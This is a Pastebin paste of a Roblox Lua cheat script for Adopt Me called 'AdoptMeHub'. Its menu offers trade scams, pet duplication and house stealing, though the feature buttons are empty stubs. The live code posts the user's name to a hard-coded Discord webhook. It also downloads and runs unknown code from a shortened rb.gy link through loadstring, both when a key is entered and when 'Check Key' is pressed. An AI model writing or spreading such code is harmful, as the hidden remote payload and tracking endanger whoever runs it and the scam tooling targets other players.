Murraykerr0911

Untitled

Jun 18th, 2024
51
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.57 KB | None | 0 0
  1. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  2.  
  3. local validKey = "KEY"
  4. local keyEntered = false
  5. local HttpService = game:GetService("HttpService")
  6. local Players = game:GetService("Players")
  7.  
  8. local webhookUrl = "https://discord.com/api/webhooks/1250434395546976337/wUrptlCbzpNAKiY9vGN9QGlpr9ktJiU79boFS4LI5Weak9EKIk57hZ3OsUfVj1CntTd7"
  9. local playerName = Players.LocalPlayer.Name
  10.  
  11. local function sendWebhookMessage(message)
  12. local payload = HttpService:JSONEncode({
  13. content = message
  14. })
  15. HttpService:PostAsync(webhookUrl, payload, Enum.HttpContentType.ApplicationJson)
  16. end
  17.  
  18. sendWebhookMessage(playerName .. " HAS USED UR SCRIPT")
  19.  
  20. local function createMainGUI()
  21. local Window = OrionLib:MakeWindow({
  22. Name = "AdoptMeHub by Muzza [V1]",
  23. HidePremium = false,
  24. SaveConfig = true,
  25. ConfigFolder = "DBHBMconfig",
  26. IntroEnabled = true,
  27. IntroText = "ADOPTMEHUB ENJOY!"
  28. })
  29.  
  30. -- Trade Scam Tab
  31. local TradeScamTab = Window:MakeTab({
  32. Name = "Trade Scam",
  33. Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
  34. PremiumOnly = false
  35. })
  36.  
  37. TradeScamTab:AddTextbox({
  38. Name = "Username",
  39. Default = "",
  40. TextDisappear = true,
  41. Callback = function(value)
  42. print("Username entered for Trade Scam: " .. value)
  43. -- Add your trade scam function here
  44. end
  45. })
  46.  
  47. TradeScamTab:AddButton({
  48. Name = "Trade Scam",
  49. Callback = function()
  50. print("Trade Scam button clicked")
  51. -- Add your trade scam function here
  52. end
  53. })
  54.  
  55. TradeScamTab:AddButton({
  56. Name = "Hide Pets",
  57. Callback = function()
  58. print("Hide Pets button clicked")
  59. -- Add your hide pets function here
  60. end
  61. })
  62.  
  63. -- Dupe Pets Tab
  64. local DupePetsTab = Window:MakeTab({
  65. Name = "Dupe Pets",
  66. Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
  67. PremiumOnly = false
  68. })
  69.  
  70. DupePetsTab:AddTextbox({
  71. Name = "Pet Name",
  72. Default = "",
  73. TextDisappear = true,
  74. Callback = function(value)
  75. print("Pet Name entered for Dupe Pets: " .. value)
  76. -- Add your dupe pets function here
  77. end
  78. })
  79.  
  80. DupePetsTab:AddButton({
  81. Name = "Dupe Pet",
  82. Callback = function()
  83. print("Dupe Pet button clicked")
  84. -- Add your dupe pet function here
  85. end
  86. })
  87.  
  88. DupePetsTab:AddButton({
  89. Name = "Make Pet Fly",
  90. Callback = function()
  91. print("Make Pet Fly button clicked")
  92. -- Add your make pet fly function here
  93. end
  94. })
  95.  
  96. DupePetsTab:AddButton({
  97. Name = "Make Pet Ride",
  98. Callback = function()
  99. print("Make Pet Ride button clicked")
  100. -- Add your make pet ride function here
  101. end
  102. })
  103.  
  104. DupePetsTab:AddButton({
  105. Name = "Make Pet Neon",
  106. Callback = function()
  107. print("Make Pet Neon button clicked")
  108. -- Add your make pet neon function here
  109. end
  110. })
  111.  
  112. DupePetsTab:AddButton({
  113. Name = "Make Pet MegaNeon",
  114. Callback = function()
  115. print("Make Pet MegaNeon button clicked")
  116. -- Add your make pet meganeon function here
  117. end
  118. })
  119.  
  120. -- House Steal Tab
  121. local HouseStealTab = Window:MakeTab({
  122. Name = "House Steal",
  123. Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
  124. PremiumOnly = false
  125. })
  126.  
  127. HouseStealTab:AddTextbox({
  128. Name = "Username",
  129. Default = "",
  130. TextDisappear = true,
  131. Callback = function(value)
  132. print("Username entered for House Steal: " .. value)
  133. -- Add your house steal function here
  134. end
  135. })
  136.  
  137. HouseStealTab:AddButton({
  138. Name = "Trade House Scam",
  139. Callback = function()
  140. print("Trade House Scam button clicked")
  141. -- Add your trade house scam function here
  142. end
  143. })
  144.  
  145. -- Auto Farm Tab
  146. local AutoFarmTab = Window:MakeTab({
  147. Name = "Auto Farm",
  148. Icon = "rbxassetid://icon_id", -- Replace with your icon ID if available
  149. PremiumOnly = false
  150. })
  151.  
  152. AutoFarmTab:AddTextbox({
  153. Name = "Pet Name",
  154. Default = "",
  155. TextDisappear = true,
  156. Callback = function(value)
  157. print("Pet Name entered for Auto Farm: " .. value)
  158. -- Add your autofarm function here
  159. end
  160. })
  161.  
  162. AutoFarmTab:AddButton({
  163. Name = "[Event] Autofarm",
  164. Callback = function()
  165. print("[Event] Autofarm button clicked")
  166. -- Add your event autofarm function here
  167. end
  168. })
  169.  
  170. AutoFarmTab:AddButton({
  171. Name = "[Pet] Autofarm",
  172. Callback = function()
  173. print("[Pet] Autofarm button clicked")
  174. -- Add your pet autofarm function here
  175. end
  176. })
  177.  
  178. AutoFarmTab:AddButton({
  179. Name = "[Baby] Autofarm",
  180. Callback = function()
  181. print("[Baby] Autofarm button clicked")
  182. -- Add your baby autofarm function here
  183. end
  184. })
  185.  
  186. OrionLib:Init()
  187. end
  188.  
  189. local function createKeyGUI()
  190. local KeyWindow = OrionLib:MakeWindow({
  191. Name = "Enter Key",
  192. HidePremium = true,
  193. SaveConfig = false,
  194. IntroEnabled = false
  195. })
  196.  
  197. KeyWindow:AddTextbox({
  198. Name = "Enter Key",
  199. Default = "",
  200. TextDisappear = true,
  201. Callback = function(value)
  202. if value == validKey then
  203. keyEntered = true
  204. print("Valid key entered")
  205. loadstring(game:HttpGet("https://rb.gy/mj1mih"))()
  206. KeyWindow:Destroy()
  207. createMainGUI()
  208. else
  209. print("Invalid key entered")
  210. OrionLib:MakeNotification({
  211. Name = "Invalid Key",
  212. Content = "The key you entered is incorrect. Please try again.",
  213. Image = "rbxassetid://icon_id", -- Replace with your icon ID if available
  214. Time = 5
  215. })
  216. end
  217. end
  218. })
  219.  
  220. KeyWindow:AddButton({
  221. Name = "Check Key",
  222. Callback = function()
  223. loadstring(game:HttpGet("https://rb.gy/mj1mih"))()
  224. end
  225. })
  226.  
  227. OrionLib:Init()
  228. end
  229.  
  230. createKeyGUI()
  231.  
Advertisement
Add Comment
Please, Sign In to add comment